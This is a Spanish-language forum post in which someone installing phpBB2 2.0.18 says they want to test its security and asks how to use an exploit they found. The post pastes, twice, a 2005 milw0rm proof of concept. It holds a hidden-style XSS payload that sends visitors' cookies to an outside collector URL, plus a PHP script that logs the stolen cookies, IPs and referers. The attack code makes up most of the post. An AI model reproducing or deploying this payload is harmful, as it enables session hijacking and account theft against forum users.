Autor
Pero estoy instalando un forito phpBB2 por ahi y me interesa la seguiridad asi que busco xploits o formas de hackarlo para ver que tan vulnerables son
Encontre por ahi este xploit para la version phpBB2 2.018
que es la version que quiero instalar, pero ni idea si sirve y como se hace funcionar, aun no aprendo bien lo de compilar y todo lo demas, pero consulto a ustedes que saben mas, si este exploit sirve, si alguien lo ha probado y como se haria funcionar
Código:
/******************************************************************
phpBB <= 2.0.18 XSS Cookie Disclosure Proof of Concept
-- 'the html is on exploit'
original exploit by: (cXIb8O3) - 12/16/2005
proof of concept by: jet
-- http://jet.carbon-4.net/
develop a pure, lucid mind, not
depending upon sound, flavor,
touch, odor, or any quality.
- the diamond sutra
******************************************************************/
phpbb code:
<B C=">" ''style='font-size:0;color:#EFEFEF'style='top:epresionje(eval(this.sss));'sss=`i=new/**/Image();i.src='http://www.url.com/cookie/c.php?c='+document.cookie;this.sss=null`style='font-size:0; X="<B ">'</B>
c.php:
<?php
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$date=date("m/d/Y g:i:s a");
$referer=getenv ('HTTP_REFERER');
$fl = fopen('log.txt', 'a');
fwrite($fl, "\n".$ip.' :: '.$date."\n".$referer." :: ".$cookie."\n");
fclose($fl);
?>
# milw0rm.com [2005-12-21]
phpBB <= 2.0.18 XSS Cookie Disclosure Proof of Concept
-- 'the html is on exploit'
original exploit by: (cXIb8O3) - 12/16/2005
proof of concept by: jet
-- http://jet.carbon-4.net/
develop a pure, lucid mind, not
depending upon sound, flavor,
touch, odor, or any quality.
- the diamond sutra
******************************************************************/
phpbb code:
<B C=">" ''style='font-size:0;color:#EFEFEF'style='top:epresionje(eval(this.sss));'sss=`i=new/**/Image();i.src='http://www.url.com/cookie/c.php?c='+document.cookie;this.sss=null`style='font-size:0; X="<B ">'</B>
c.php:
<?php
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$date=date("m/d/Y g:i:s a");
$referer=getenv ('HTTP_REFERER');
$fl = fopen('log.txt', 'a');
fwrite($fl, "\n".$ip.' :: '.$date."\n".$referer." :: ".$cookie."\n");
fclose($fl);
?>
# milw0rm.com [2005-12-21]
En línea
